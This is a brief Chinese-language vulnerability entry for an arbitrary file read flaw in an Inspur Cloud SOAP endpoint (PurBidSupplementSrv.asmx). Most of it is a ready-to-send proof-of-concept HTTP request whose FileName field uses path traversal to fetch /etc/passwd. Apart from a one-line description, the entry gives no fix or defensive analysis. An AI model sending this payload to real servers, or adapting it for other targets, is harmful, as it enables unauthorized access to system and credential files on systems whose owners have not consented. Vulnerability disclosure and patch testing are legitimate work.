漏洞描述
浪潮云的 /cwbase/service/cepp/PurBidSupplementSrv.asmx 接口存在文件读取漏洞,攻击者可以通过发送特制的 SOAP 请求读取服务器上的任意文件,可能导致敏感信息泄露。
浪潮云 /cwbase/service/cepp/PurBidSupplementSrv.asmx 文件读取漏洞
PoC代码
POST /cwbase/service/cepp/PurBidSupplementSrv.asmx HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 296
Content-Type: application/soap+xml; charset=utf-8
User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/109.0 Safari/537.36
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.example.com/">
<soapenv:Header/>
<soapenv:Body>
<web:GetFile>
<web:FileName>../../../../etc/passwd</web:FileName>
</web:GetFile>
</soapenv:Body>
</soapenv:Envelope>